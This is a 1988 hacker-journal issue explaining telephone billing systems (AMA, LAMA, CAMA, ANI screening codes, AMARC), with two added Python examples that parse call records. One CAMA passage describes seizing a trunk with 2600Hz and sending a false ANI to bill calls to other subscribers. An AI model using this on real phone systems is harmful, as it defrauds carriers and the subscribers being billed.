The LOD/H Technical Journal, Issue #3: File 01 of 11

Released: October 21, 1988



                              THE

                     LOD/H TECHNICAL JOURNAL
                     -----------------------


INTRODUCTION:


When putting together a high quality newsletter, it is sometimes difficult
to locate suitable articles and arrange with the author for transmission.
Difficulties of this type have caused this issue to be almost one year late.
All of the older articles have been updated to ensure the latest, most
accurate information.

2600 Magazine update:

Lex Luthor's Hacking IBM VM/CMS Systems article from Issue 2 has been
published in the November/December 1987 issue of 2600. Phucked Agent 04's
article on the Outside Loop Distribution Plant has been published in the
Fall/88 issue. This brings the total up to 5 articles from the LOD/H
Technical Journal that they have published. The others were CLASS by The
Videosmith, the TSPS Console by The Marauder, and Update #4 of the LOH Telenet
Directory. To subscribe to 2600, which is published quarterly, contact:

2600
PO Box 762
Middle Island, NY USA 11953

Or call for more information: (516) 751-2600


You can find the Technical Journal on the following boards:

The Phoenix Project: 512-441-3088
Digital Logic      : 305-752-8645 (NEW USER PASS = RISC)

------------------------------------------------------------------------------

TABLE OF CONTENTS:

01 Introduction to the LOD/H Technical Journal         Staff             02 K
   and Table Of Contents for Volume 2, Issue 3

02 Understanding Automatic Message Accounting Part A   Phantom Phreaker  22 K

03 Understanding Automatic Message Accounting Part B   Phantom Phreaker  25 K

04 Update file: Shooting Shark's UNIX password hacker  Shooting Shark    03 K

05 An Introduction to Teradyne's 4TEL System           Doom Prophet      12 K

06 A Cellular Automaton Encryption System              The Mentor        29 K

07 Hacking the IRIS Operating System                   The Leftist       13 K

08 A Guide to Coin Control Systems                     Phase Jitter      08 K

09 A UNIX password hacker from USENET                  -------------     16 K

10 Reprint News Article: 'LOD BUST MYTH'               --------------    13 K

11 Network News & Notes                                The Mentor        30 K

Total: 6 articles, 11 files                                             173 K

------------------------------------------------------------------------------


The LOD/H Technical Journal, Issue #3: File 02 of 11

$LOD$LOD$LOD$LOD$LOD$LOD$LOD$LOD$LOD$LOD$LOD$LOD$LOD$
L                                                   L
O           AUTOMATIC MESSAGE ACCOUNTING            O
D                                                   D
$                       (AMA)                       $
L                                                   L
O                    An overview                    O
D                                                   D
$            Written by Phantom Phreaker            $
L                                                   L
O                  Legion Of Doom!                  O
D                                                   D
$LOD$LOD$LOD$LOD$LOD$LOD$LOD$LOD$LOD$LOD$LOD$LOD$LOD$

<part one of two>

This article is meant to provide an explanation of Automatic Message
Accounting (AMA) and how it was/is used in the past and present.

All information included in this file is correct to my knowledge; however,
if anyone notices any errors or has anything interesting to add, try to get in
touch with me one way or another and let me know.

Hopefully this article will clear up any misconceptions about AMA that
have been circulating around on bulletin boards and by word of mouth. Keep in
mind, however, that the information here may not be applicable to your
specific area or telco. The information contained herein generally applies to
the BOCs, and if you are served by an independent telco, your method of
billing may differ.

This article is aimed more towards the more experienced telecommunications
enthusiast. People with limited knowledge may have a hard time understanding
the information presented here. However, if you can contact me I will try to
answer any questions or clarify anything included in this article that isn't
understood.

Information will be included in this article concerning the use of AMA in
the past. This is being done for people in older areas or areas served by an
independent telco that may still be using the old technology.


HISTORY
-------

In the past, Call Detail Record (CDR) information was collected and
recorded by cordboard operators in a process known as manual ticketing. The
operator recorded this information by writing it down manually upon a
formatted record called a ticket. These tickets were sent to the appropriate
office where billing was handled. This manual ticketing process was
time-consuming, and was phased out with the introduction of electromechanical
switching.

Before the advent of AMA, a magnetically operated counter called a message
register was associated with each subscriber's line in a given central office.
This counter was responsible for counting the number of calls that each
subscriber made, for billing purposes. This message register was caused to
operate one or more times when the called party answered the telephone. The
way this worked is that when the called party answered, a reverse battery
signal was sent back over the trunk circuit to activate a relay in the
originating office, which was responsible for the application of a 48-volt
battery to advance the message register the appropriate number of units. A
local call is/was usually one message unit, regardless of how long the call
lasted. Local calls to further away areas were/are usually two message units.
Long distance calls were handled either by cordboard operators, using manual
ticketing, or by a method not involving operators known as zone registration.
With zone registration, calls to different zones would cause the message
register to operate two or more times per time period. This would make the
cost higher for longer calls, and less for shorter calls.

At the end of the billing period, each message register had to be manually
photographed to keep track of the number of calls made by that specific
subscriber. These photos were taken by a 35 millimeter camera that was known
as a Traffic Usage Recorder, and then sent to the same place that manual
tickets (prepared by operators) were. However, this method of billing soon
grew costly and inefficient, so a new method, LAMA (Local Automatic Message
Accounting) was developed. Additional and more specific information shall be
included later in the article.

In the late 1940s, the Bell System developed LAMA, which recorded the
billing information in a much more efficient manner. However, some end offices
did not have enough call traffic to warrant the installation of LAMA
equipment. To solve this problem, CAMA (Centralized Automatic Message
Accounting) was developed in the mid-1950s. CAMA was different from LAMA in
that it was based in a toll or tandem office and could record the AMA
information for every end office that it served. More on LAMA and CAMA will be
included later in the article.

Another development concerning AMA is the computerization of the system,
named LAMA-C or CAMA-C, for 'LAMA-Computerized' or 'CAMA-Computerized'. CAMA
had used paper tape perforators for a time before the magnetic tape method was
introduced with CAMA-C. LAMA-C is a computerized version of LAMA which also
uses magnetic tape (LAMA-C is still used today). LAMA and LAMA-A (previous
versions) used paper tape, although LAMA-A was more efficient.

LAMA, LAMA-A, CAMA, and CAMA-C were all part of the AMARS, the Automatic
Message Accounting Recording System. However, a newer term for more modern
setups is the AMACS, for Automatic Message Accounting Collection System. The
AMACS includes end office AMA systems, a recent introduction called the AMARC
(AMA Recording Center), AMARC sensors in the end offices, the data links used
to transmit billing information from the end offices to the AMARC, and data
receivers located at the AMARC site. The AMARC is a product of the new age of
computerized technology as it applies to the telecommunications systems used
in our society. Still, LAMA and CAMA and their different versions shall be
described and explained to help people understand how they were/are used.


LAMA
----

LAMA is described by Notes on the Network (1983) as 'A process using
equipment located in a local office for automatically recording billing data
for message rate calls and for customer-dialed station to station toll
calls'. What this means is that if your CO uses LAMA, and you are on a
single party line (most people are), all 1+ toll calls will be billable by
LAMA equipment, and so will all calls coming from message rate lines. A
message rate line, for those of you not familiar with the term, is a telephone
line that has the ability to receive incoming calls, but all outgoing calls
will cost the subscriber. The subscriber pays for basic service (the ability
to receive calls) with the consideration that all other calls (even local
ones) will cost a certain amount of money per call. Many subscribers in
several major cities get this feature automatically, and thus phone bills are
generally higher in these areas.

LAMA originally recorded billing information on punched paper tape, in a
version known as LAMA-A, but now magnetic tape is generally the format used in
places where LAMA-C equipment is used. The paper tape perforators that
recorded the CDR data in LAMA-A were noisy, and they needed maintenance due to
their electromechanical construction. The magnetic tape method is much more
reliable, and quieter as well.

If a person's end office uses LAMA, then all toll calls from all lines and
all local calls from metered rate lines are recorded on the LAMA tape, with a
few exceptions. LAMA can only be used to record AMA information for one and
two party lines. On other party lines such as three and four party, the
originating caller has his/her number identified by an operator via the ONI
(Operator Number Identification) method. It has not been determined by the
author if the BOC (Bell Operating Company) operators such as TOPS (Traffic
Operator Position System, made by Northern Telecom Inc. of Canada) or MPOW
(Multi-Purpose Operator Workstation, by US West) operators would be used for
this ONI or not. I would guess that AT&T TSPS operators would handle an
inter-LATA toll call, and that the BOC TOPS/MPOW operators would handle the
ONI for an intra-LATA call (my reasoning behind this statement is the fact
that whenever I have had an ONI due to equipment failure, which is similar to
ONI needed, only the ANI outpulsing was garbled; the called number was still
transmitted in the correct fashion. I am assuming that the end office
switching system would route the call to the correct operator position by
matching the NPA-NXX with some sort of internal table which makes a
distinction between intra and inter-LATA calls). Anyway, these calls had their
AMA information sent from the appropriate operator position to the toll office
that served the 3+ party line, onto CAMA tape. Another instance in which a
LAMA office may use CAMA instead is when an ANIF (ANI Failure) occurs. If the
ANIF is sent to TSPS, then that TSPS will record billing information upon CAMA
tape by using ONI. It seems that AMA information that has been recorded by an
operator is buffered and stored until it is time to send the information to
the appropriate places for processing. In the case of AT&T TSPS operators, the
TSPS had its own magnetic tape which was sent to the RAO (Regional Accounting
Office, formerly called Revenue Accounting Office) on a regular basis. I am
not sure if this method is still used or if TSPS AMA has been updated or
enhanced in some way.


EXAMPLES OF LAMA USAGE
----------------------

The following is the call flow procedure in a LAMA-A (paper tape) system.

After a customer completes dialing, the dialed number (the called number),
the originating class of service, Line Equipment Number (LEN), and call type
are sent from the switch to the AMA equipment. Translations, such as figuring
the billing telephone number from the Line Equipment Number, are done. The
information that comes from the translations procedures determines which paper
tape perforator shall be used to record the data for this specific call. A
record of the initial information gathered is called the initial entry. The
last line of the initial entry contains a two digit code called a Call
Identity Index (CII), which identifies telco equipment such as the trunk or
district junctor that will be used for that call.

When the call is answered, another entry is made, called the answer
entry. This entry is a single line on the paper tape and has the CII and the
exact time that the call was answered on it.

The last entry on the paper tape is known as the disconnect entry. This
entry contains the CII and the exact time that the call ended.

The CII is important because it is what the RAO used to group together all
the data about a given call. Entries are recorded at different times in a LAMA
system and are not in sequential order, so the CII makes it easier to find
all three entries for a specific call.

This method of recording AMA information required the RAO to 'unshuffle
the deck' when it came time to organize the AMA information. The variations in
the AMA recording formats used by different switching systems eventually led
Bellcore to develop a standard AMA format, named the Bellcore AMA Format
(BAF). More information will be included about this format later in the
article.
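
As an added illustration (not part of the original article), the following
Python models the RAO's 'unshuffle the deck' step for the three-entry LAMA-A
format described above: initial, answer and disconnect entries arrive
interleaved, and the CII is the only key tying them together. Because a CII
identifies a trunk or junctor rather than a call, the same CII reappears once
that equipment is reused, so the grouping also has to notice when a new initial
entry starts a fresh call. The entry layout and the sample tape are constructed
for this example and are not the real Bell paper-tape format.

```python
"""Regroup interleaved LAMA-A style entries by Call Identity Index (CII).

The entry layout is constructed for illustration: it keeps only the fields
the article names (CII, calling and called numbers, answer and disconnect
times) and is not the real Bell paper-tape format.
"""
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

# Constructed sample tape, one entry per line, fields separated by '|'.
# Kinds: I = initial entry, A = answer entry, D = disconnect entry.
# Times are seconds after midnight. CII 17 (a trunk) is reused for a
# second call once the first one disconnects, and CII 09 never reaches
# answer or disconnect on this tape.
SAMPLE_TAPE = """\
I|17|5551212|3125550199
I|42|5553434|2125550123
A|17|36000.0
A|42|36012.5
D|17|36185.3
I|17|5559999|5550100
A|17|36300.0
D|42|36100.0
D|17|36330.5
I|09|5557878|5550100
"""


@dataclass
class CallRecord:
    cii: str
    calling: Optional[str] = None
    called: Optional[str] = None
    answer: Optional[float] = None
    disconnect: Optional[float] = None

    def duration(self) -> Optional[float]:
        """Conversation time in seconds, or None if answer/disconnect is missing."""
        if self.answer is None or self.disconnect is None:
            return None
        return round(self.disconnect - self.answer, 1)

    def complete(self) -> bool:
        return self.duration() is not None and self.calling is not None


def unshuffle(tape: str) -> Tuple[List[CallRecord], List[CallRecord]]:
    """Reassemble calls from interleaved entries.

    A CII identifies equipment, not a call, so it only ties entries together
    while that trunk is busy: a fresh initial entry for a CII closes whatever
    record was open on it. Returns (finished, incomplete) in tape order.
    """
    open_calls: Dict[str, CallRecord] = {}
    finished: List[CallRecord] = []
    incomplete: List[CallRecord] = []

    def close(cii: str) -> None:
        rec = open_calls.pop(cii)
        (finished if rec.complete() else incomplete).append(rec)

    for raw in tape.splitlines():
        if not raw.strip():
            continue
        kind, cii, *fields = raw.split("|")
        if kind == "I":
            if cii in open_calls:          # trunk reused without a disconnect entry
                close(cii)
            open_calls[cii] = CallRecord(cii, calling=fields[0], called=fields[1])
        elif kind in ("A", "D"):
            rec = open_calls.setdefault(cii, CallRecord(cii))  # orphan: no initial entry
            if kind == "A":
                rec.answer = float(fields[0])
            else:
                rec.disconnect = float(fields[0])
                close(cii)
        else:
            raise ValueError(f"unknown entry kind {kind!r} in {raw!r}")

    for cii in list(open_calls):           # calls still open at end of tape
        close(cii)
    return finished, incomplete


if __name__ == "__main__":
    done, partial = unshuffle(SAMPLE_TAPE)
    for rec in done:
        print(f"CII {rec.cii}: {rec.calling} -> {rec.called}, {rec.duration()} s")
    print("incomplete:", [r.cii for r in partial])
```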

In a No. 5 Crossbar switching system, the AMA setup used special purpose 3
inch wide paper tape on which AMA records were recorded by CO equipment. This
method of recording is from the stone ages, as it has been phased out by
almost every BOC. Similar to the LAMA-A call flow, this method of AMA used
three AMA entries. The first one was the customer's service information, which
included the calling and called telephone numbers, the second one was recorded
when the telephone was answered, and the third one was recorded at disconnect.
This also made the job at the RAO a bit harder, as again, they had to
'unshuffle the deck'.

The No. 2 ESS introduced the latest magnetic tape recording technology
that was available at that time. The 2E used 200 BPI, 7 track mag tapes, and
it introduced special data coding conventions. Its technology and
conventions are still in use today, but I think that the BPI and number of
tracks have been increased. The 2E mimics the No. 5 Crossbar AMA method by
recording three entries and interleaving them on the magnetic tape. Data
common to all calls on a tape (such as date, CO info, etc.) are recorded in
special tape headers. The No. 2B ESS was introduced with the same AMA
technology as the 2E, but a 2B that provides equal access capabilities for
interexchange carriers adds a new data entry to the three used by the 2E. This
new entry reports the time of connection of a carrier to the local network,
which is needed for carrier access billing.

The No. 1 ESS modernized the AMA process even more. The 1E used 200 BPI,
nine track tape. The 1E provides data collection memory registers for AMA
information on applicable calls. A register is assigned to an AMA call and
kept open for the call's duration. This register collected most of the billing
data that was needed. The AMA information was then written to magtape at the
time of disconnect. This made it easier for the RAO to process. The AMA
format used by the 1E uses variable length records whose fields occur for the
most part in a general, preset pattern. Eventually, though, even the 1E AMA
method was found to be slightly faulty. This was due to high processing costs
at the RAO and the problem of tape headers getting erased from the tape. The
BAF was made to solve the problems that are associated with other AMA setups.
An update to the BAF is called the EBAF, or Extended Bellcore AMA Format. The
main difference between the BAF and EBAF is that EBAF is more flexible and can
be used more easily, as the BAF uses a defined structure for storing data. The
EBAF can append other information to the end of an AMA record, and this makes
it more flexible.


ANI FORMATS
-----------

The ANI formats outpulsed in a LAMA arrangement are as follows (assume
that the call being shown for an example is being dialed from a home
telephone, as dialing from coinphones would cause different ST signals to be
sent; also the type of signaling in this case is SF in-band):

CALLED number:  KP+(NPA)+NXX+XXXX+ST
CALLING number: KP+I+NXX+XXXX+ST

The second format is the ANI associated with LAMA and is sent to the LAMA
equipment after the ANI receiving trunk winks. The NPA included in this
example is optional and only needed if the subscriber is making a call to a
Foreign NPA (FNPA). The complete called number is not included in all cases,
as when an AMA setup is configured for bulk-billing. In bulk-billing, the
entire called number is not recorded, but just enough for billing purposes.
The CALLING number is the number that the subscriber is dialing from. These
two numbers are sent in Multi Frequency (MF) tones to MF receivers located
within a CO. The I in the ANI is an information digit, and these shall be
explained later in the article.

One may wonder how a CO knows which lines it serves are message rate lines
and which are flat rate. On electromechanical switches such as Step by Step,
No. 1 and No. 5 Crossbar (it should be noted that there are no remaining panel
switches within the Bell System), there is an electronic line card associated
with each Directory Number which holds information relevant to that line.
These cards have to have any type of change hardwired into them. However, in
digital/electronic switching systems, there are Line Class Codes which
reflect information about each subscriber's line. There are many, many of
these codes. Some of the more common and interesting ones are listed below:

LCC   EXPLANATION
---   -----------
1FR   Single party Flat rate Residential line
1MR   Single party Metered rate Residential line
1CF   Single party Coin First coin telephone
1OF   Single party Official (telco) line
1FB   Single party Flat rate Business line
1MB   Single party Metered rate Business line

These codes can be found for a line in several places, such as certain
fields in telco computer output reports. COSMOS and LMOS are two such
computers that hold this information. If you find COSMOS printouts or have
access to COSMOS, these Line Class Codes will be listed under the 'LCC' field
in an ISH, INQ, or other inquiry. Sometimes the data in the LCC field will
match or be similar to the data in the US field, which is a USOC (Universal
Service Order Code). A USOC and an LCC aren't the same thing though.


CAMA
----

CAMA operates along the same basic principle that LAMA does, except that
CAMA is based in a toll or tandem office (class 4). CAMA is made to be used in
areas where it would be costly to implement a LAMA arrangement for each and
every class 5 office. This is because some end offices did not have enough
traffic to warrant the cost and work required to install LAMA equipment. LAMA
setups can/could be found in abundance in rural areas near large cities.

The first letter in each of the acronyms (L)AMA and (C)AMA describes the
usage of each: (L)AMA, for Localized, in a local central office, and (C)AMA,
for Centralized, in a toll office.

The outpulsing formats to CAMA are similar to the LAMA ANI outpulsing. The
outgoing trunk to the serving CAMA office from the end office sends the called
DN in the format of KP+(NPA)+NXX+XXXX+ST. Next, the incoming CAMA trunk
requests the end office to send the calling number. This is sent as
KP+I+(NPA)+NXX+XXXX+ST, where the I is an information digit which gives
information about the status of the process, and the NPA may or may not be
needed, depending upon the setup. The information digits that follow are used
in ANI outpulsing to Local and Centralized AMA. They are:

0 - Automatic Identification (a normal call, with no special treatment);

1 - Operator Identification (ONI; the call is sent to an operator who
    requests the customer to give the number they are calling from);

2 - Identification Failure (ANI Failure, handled the same way as ONI).

Both the ONI due to ANIF and the normal ONI which is used on certain party
lines are kept track of. If too many ANI Failures happen, then a report will
be generated indicating this fact. ONI needed is more standard and ordinary,
and thus safer for the telecommunications enthusiast. This information can be
put to a good use, as if you find an outgoing CAMA trunk when you are boxing,
you can place calls over it by using the above CAMA formats. The only limiting
factor is that the NXX of the calling number that you sent for ANI must be an
office that is served by the particular CAMA office's trunk that you are using.

Note that CAMA is not used much anymore; it was mainly used with
electromechanical toll switches such as the No. 4A Crossbar, and the Crossbar
Tandem (XBT). I don't think there are any XBTs or 4As in operation in the AT&T
toll network, but CAMA may be used by independent telcos, or by telcos in rural
areas that serve only a small number of central offices. In an independent
telco setup, a CAMA arrangement may be used, but not in the same way as AT&T
has used it. The centralized location may not be a toll office, it may just be
the largest CO in that company's network. There can be several variations.
CAMA was originally introduced to work in conjunction with ANI, thus the
original term for the process, CAMA/ANI. For a complete description of ANI
in electromechanical switching systems, see one of the older issues of Phrack
Inc. newsletter for a file written by Doom Prophet and myself, titled
'Automatic Number Identification'. I have seen CAMA mentioned in recent telco
information, so I assume that CAMA is still in use, at least in some places.
Supposedly a way to determine if you are on CAMA is to dial local numbers, and
send 2600Hz. If you can seize a trunk, then it is likely that you are served
by CAMA. You can then pick local exchange codes, (NXX), dial them, seize a
trunk, and then MF using the CAMA format included above, sending a false ANI
for one of the local exchanges. If you do this, I suggest that you don't send
the ANI of a resident. Use non-working numbers, disconnected numbers, payphone
numbers. I am not sure if there is any check done upon the number sent in ANI
by the toll office or not, but it is probable that the local switch is
responsible for screening out invalid numbers and such. So if you can get on a
CAMA trunk then you have the power to bill calls to anyone else who is served
by a CO that homes in on the same toll office and uses the same CAMA
equipment.

<end of part one>

The LOD/H Technical Journal, Issue #3: File 03 of 11


$LOD$LOD$LOD$LOD$LOD$LOD$LOD$LOD$LOD$LOD$LOD$LOD$LOD$
L                                                   L
O           AUTOMATIC MESSAGE ACCOUNTING            O
D                                                   D
$                       (AMA)                       $
L                                                   L
O                    An overview                    O
D                                                   D
$            Written by Phantom Phreaker            $
L                                                   L
O                  Legion Of Doom!                  O
D                                                   D
$LOD$LOD$LOD$LOD$LOD$LOD$LOD$LOD$LOD$LOD$LOD$LOD$LOD$

<part two of two>


The standard AT&T Toll office switch, the No. 4 ESS, is also equipped to
handle CAMA if necessary. The CAMA procedure is as follows: Call data for the
CAMA call is kept in a buffer (technically called an Accounting Block (AB))
which then stores the entry upon a nine track 800-bpi (bits per inch) AMA tape
(note: the information used in research for this part of the article was
rather old, so the bits per inch has probably increased). The data that are
kept in this buffer and put on the tape are as follows: the calling DN, the
called DN, answer and disconnect times accurate to 0.1 second, and other misc.
information. The caller's DN can be entered into the 4ESS in two ways, ANI or
ONI. ANI is of course the normal method for identifying a caller's DN for
billing purposes. ONI is used when there is an ANIF, or when it is needed (the
other equipment cannot get the DN with ANI). When the 4E gets an ANIF or an
ONI needed, it sends the call to a TSPS operator, who should ask the caller
for their number. When an operator gets an ONI situation 'from' a 4E, she uses
two types of trunks, a talking trunk, and a keying trunk. The talking trunk is
what the subscriber comes in upon and is the line over which the operator asks
for the caller's DN. The keying trunk originates at the 4E and terminates at
TSPS, and is what is used to send the caller's DN (in MF) to the 4ESS office.
The operator has access to both trunks at the same time, thus she can enter
the number in a quick and orderly fashion.

When a line classification does not fit into the 'one information digit'
(KP+I+NNX+XXXX+ST) category, two information digits are used. When two are
used, they are called screening codes. Screening codes are outpulsed along
with the ANI for certain types of telephone lines, and when ANI is being sent
to an alternate carrier via 'Equal Access' (Feature Group D, 1+ dialing).
These screening codes are two digits and precede the subscriber's DN. An
example of screening code outpulsing is as follows:

KP+II+NNX+XXXX+ST

The II represents two information digits that precede the caller's number.
Some of the more common screening codes are as follows:

KP+00+NXX+XXXX+ST   Normal telephone call, identified POTS line;
KP+01+NXX+XXXX+ST   ONI needed on a multiparty line;
KP+02+NXX+XXXX+ST   ONI needed due to ANI Failure;
KP+07+NXX+XXXX+ST   Hospital, inmate type telephone;
KP+08+NXX+XXXX+ST   Line restricted from dialing inter-LATA;
KP+10+NNX+XXXX+ST   Telco test call;
KP+20+NNX+XXXX+ST   Automatic Identified Outward Dialing centrex call;
KP+27+NNX+XXXX+ST   Coin telephone call.

These double digit outpulsing formats are used in Equal Access areas, and
a similar method of outpulsing is used when customers deal with TSPS
operators.

For more information, see the July, 1987 issue of 2600 Magazine, an article
entitled 'How phreaks are caught'.
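
As an added example (not from the original article), the following Python
decodes the ANI outpulsing strings described in part one (the single
information digit form KP+I+NXX+XXXX+ST and its optional NPA) and the two-digit
screening-code form listed just above, and then produces the kind of
ANI-failure report the article says the telco generates when too many ANIF
calls occur. The code tables are the ones given in the article; the sample
outpulsing log, the category names and the 10% failure threshold are
constructed for this example.

```python
"""Decode ANI outpulsing strings and tally ONI/ANIF outcomes.

Formats handled (as given in the article):
    KP + I  + [NPA] + NXX + XXXX + ST    one information digit
    KP + II + [NPA] + NXX + XXXX + ST    two-digit screening code
The sample log and the failure threshold below are constructed.
"""
import re
from collections import Counter
from typing import Dict, List, NamedTuple, Optional

# Screening codes listed in the article (two-digit form).
SCREENING_CODES: Dict[str, str] = {
    "00": "Normal telephone call, identified POTS line",
    "01": "ONI needed on a multiparty line",
    "02": "ONI needed due to ANI Failure",
    "07": "Hospital, inmate type telephone",
    "08": "Line restricted from dialing inter-LATA",
    "10": "Telco test call",
    "20": "Automatic Identified Outward Dialing centrex call",
    "27": "Coin telephone call",
}
# Single information digits used toward LAMA and CAMA.
INFO_DIGITS: Dict[str, str] = {
    "0": "Automatic Identification",
    "1": "Operator Identification (ONI)",
    "2": "Identification Failure (ANIF)",
}

# KP, one or two info digits, an optional NPA ahead of NXX+XXXX, then ST.
_ANI_RE = re.compile(r"^KP\+(?P<info>\d{1,2})\+(?P<digits>\d{10}|\d{7})\+ST$")


class AniRecord(NamedTuple):
    info: str            # "0".."2", or a two-digit screening code
    meaning: str
    npa: Optional[str]   # the caller's NPA, sent only on calls to a foreign NPA
    number: str          # NXX-XXXX of the calling line
    needs_oni: bool      # an operator must ask the caller for the number


def parse_ani(outpulse: str) -> AniRecord:
    """Decode one ANI string; raise ValueError if malformed or the code is unknown."""
    m = _ANI_RE.match(outpulse.strip())
    if not m:
        raise ValueError(f"malformed ANI outpulsing: {outpulse!r}")
    info, digits = m.group("info"), m.group("digits")
    table = SCREENING_CODES if len(info) == 2 else INFO_DIGITS
    if info not in table:
        raise ValueError(f"unknown information/screening code {info!r}")
    npa = digits[:3] if len(digits) == 10 else None
    local = digits[-7:]
    return AniRecord(info, table[info], npa, f"{local[:3]}-{local[3:]}",
                     info in ("1", "2", "01", "02"))


def category(rec: AniRecord) -> str:
    """Fold both outpulsing forms into: identified, oni (routine), anif (trouble)."""
    if rec.info in ("2", "02"):
        return "anif"
    if rec.info in ("1", "01"):
        return "oni"
    return "identified"


def anif_report(outpulses: List[str], max_failure_rate: float = 0.10) -> dict:
    """Count outcomes and flag the office if the ANIF share exceeds the threshold.

    ONI on a multiparty line is routine, so only ANIF counts toward the rate.
    Strings that fail to parse are reported separately rather than dropped.
    """
    counts: Counter = Counter()
    rejected: List[str] = []
    for line in outpulses:
        try:
            counts[category(parse_ani(line))] += 1
        except ValueError as err:
            rejected.append(str(err))
    total = sum(counts.values())
    rate = round(counts["anif"] / total, 3) if total else 0.0
    return {"counts": dict(counts), "failure_rate": rate,
            "flagged": rate > max_failure_rate, "rejected": rejected}


# Constructed sample of ANI strings as they might arrive at a CAMA office.
SAMPLE_OUTPULSING = [
    "KP+0+5551212+ST",       # home line, automatic identification
    "KP+0+3125551212+ST",    # same, caller's NPA included (call to an FNPA)
    "KP+1+5553434+ST",       # four-party line, ONI needed
    "KP+2+5554545+ST",       # ANI failure
    "KP+00+5556767+ST",      # equal-access screening code, POTS line
    "KP+27+5550100+ST",      # coin telephone
    "KP+02+5558888+ST",      # ANI failure, screening-code form
    "KP+08+5559000+ST",      # line restricted from inter-LATA dialing
    "KP+99+5550000+ST",      # code not in the table: rejected
]

if __name__ == "__main__":
    print(anif_report(SAMPLE_OUTPULSING))
```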


AMARC
-----

The AMARC, or Automatic Message Accounting Recording Center, is a fairly
modern development toward recording billing information. It offers the telco
several advantages over the older electromechanical setups, such as increased
revenue (always a plus in their eyes), reduced RAO processing costs, a new
computerized format that stores data on 1600 bpi, industry compatible magnetic
tape, elimination of loss due to paper tapes being destroyed, and elimination
of per-office paper tape pickup and delivery.


THE NO. 1 AMARC
---------------

The first version of the AMARC was the No. 1 AMARC, which received billing
data on a real-time basis over dedicated data links. It was based on two DEC
PDP-11/40 minicomputers. The No. 1 AMARC controls and receives data from a
maximum of thirty dedicated channels. A channel consisted of a dedicated line
(probably a Private Line service) equipped with a 202T data set, operating
asynchronously at 1.2 kbps. The No. 1 AMARC had a feature which allowed it to
call, over the DDD network, a backup channel in case one of the normal
channels experienced a failure. This backup channel could be reached by anyone
who had the phone number. It has not been determined by the author if there
was/is any security on these backup channels.


THE NO. 1A AMARC
----------------

Eventually, it was decided that more data channels were needed, and that
the AMARC computer could be centralized, and not clustered in administrative
centers, as was the procedure. The No. 1A AMARC fulfilled the telco's needs.
The No. 1A AMARC uses a higher capacity minicomputer, the DEC PDP-11/70, and
Western Electric peripheral equipment to provide ninety input channels,
improved maintenance capabilities, and room for growth in several areas. The
first No. 1A AMARC began operation in 1981 in the Chicago area.

An important feature common to both the No. 1 and No. 1A AMARC was the
ability to receive billing information electronically over dedicated lines
from central office switches. Equipment located in central offices called
sensors send this data. There are different types of sensors for different
types of switching equipment, but the most common AMARC sensors shall be
listed here.

The Call Data Transmitter (CDT). The newest AMARC sensor. The CDT is a
microprocessor based system which is used to collect data from No. 5 crossbar
offices. It is designed to be used in systems that do not have LAMA-A and do
not have enough traffic to warrant the expense of installing the No. 5 ETS.
It can be used with other sensors, and is not the only kind used in No. 5
crossbars. The first one was cut over in Illinois in 1980.

The Call Data Accumulator (CDA). Similar to the CDT, but uses wired logic
control. The CDA, which collects AMA information from SxS switches, was the
first sensor to be made for use with the AMARC. This sensor is connected to
the ring, tip, and sleeve leads in a SxS switch, probably at the MDF. The
first CDA was cut over into service in New York in 1975.

The Billing Data Transmitter (BDT). Used in electromechanical offices,
such as the Nos. 1, 5, 4, and 4A Crossbar, SxS CAMA, and the Crossbar Tandem
(XBT). The BDT replaced up to 10 paper tape perforators that were previously
used, and provides a newer alternative to LAMA-A. The BDT receives billing
data from the older LAMA-A paper tape recorder circuits and sends them to the
AMARC. The first BDT was cut over in New York in 1976.

The No. 5 Electronic Translator System (ETS). The No. 5 ETS was added to
No. 5 Crossbar systems to provide some electronic switching functions that
were not present before. These functions are things such as line, trunk, and
routing translations provided by software methods rather than wired cross
connections. The No. 5 ETS consists of duplicated Western Electric 3A
auxiliary processors with associated scanners and distributors. The first No.
5 ETS was installed in Ohio in 1977.

VIDAR, a special sensor used in Crossbar No. 1 offices. VIDAR does not
interface with the AMARC but instead sends data to its own tape. This tape is
then sent to the RAO on a regular basis.

These various sensors are specially designed electronic units which are
part of or connected to class 5 offices. These sensors collect and generate
billing data from the office they are used with. The billing data consist of
answer and disconnect times, call type, and the amount of measured local and
toll calls made.

Some offices have added sensors, but exceptions include several ESS
systems which use SPC (Stored Program Control) to send data to the AMARC. SPC
means that the sensor is built into the switch software and that no other
equipment is needed. An example of this is the NTI DMS-100 switch. Nos. 2, 2B,
3, 3B, and No. 5 ESS also do not have special AMARC sensors, but send data to
the AMARC over a synchronous connection via a SPUC/DL (Serial Peripheral Unit
Controller/Data Link) at speeds of 2.4 and 4.8 kbps. There is another part in
the 2B ESS AMARC data link, called the AMARC Protocol Converter (APC). The APC
is a medium between the SPUC/DL and the AMARC.

The No. 4 ESS, TSPS, 1ESS, 1AESS, and 2ESS switches don't have AMARC
sensors, and aren't even connected to the AMARC. These switches all have their
own AMA systems, from which the data is sent to the RAO regularly. Another
exception is the DMS-10 Remote Switch, which is connected to a device at the
RAO called a collector.

There are other options possible when dealing with AMA collection, such as
the Distributed Call Measurement System (DCMS) made by a telco equipment
|
||
vendor, which acts like a mini-AMARC, and Northern Telecom's Distributed
|
||
Processing Peripheral system, which is used to collect billing data from NTI's
|
||
DMS switches. These systems can be used where applicable.
|
||
|
||
|
||
RECENT DEVELOPMENTS
-------------------

In places where magnetic tape has been phased out, a new method of storing
the AMA data called AMA TeleProcessing Systems (AMATPS) has been implemented.
AMATPS overcomes the disadvantages of magnetic tape (such as the sequential
way the data is recorded, the high-density data losses that may happen, and
the sometimes unseen problems with the tape unit) by using random access disk
drives. AMATPS also adds some new system parts which can make the job easier.
Still, some AMATPS are not used to their full capability and can still present
problems to the telco.

One of the parts that AMATPS adds to the overall AMACS is the use of AMA
Transmitters (AMATs). These transmitters are added to the sensors, and
increase the power of the overall setup by providing things such as temporary
storage areas and programming applications. AMATs are generally PC-sized
machines with two disk drives, and 50-150 megabyte hard disks.

The second important addition is the collector. The collector acts like
the AMARC by polling the AMAT over data links. The collector, like AMARC, is a
centrally located computer system, usually running on an IBM Series 1, an
HP-1000, or an AT&T 3B5.

Teleprocessing systems are made to understand a common AMA language format
made by Bellcore, the Bellcore AMA Format and Extended Bellcore AMA Format.
These were mentioned in part A of this article.

BOC/AT&T INTERACTION
--------------------

Since the majority of people are served by AT&T, one may wonder how inter-
LATA call data gets to the given Inter-LATA Carrier (IC), in this case, AT&T.
AT&T has its own AMA collection system, which is called BILDATS (BILling DATa
System), and this is what collects the AT&T data. I would guess that each AT&T
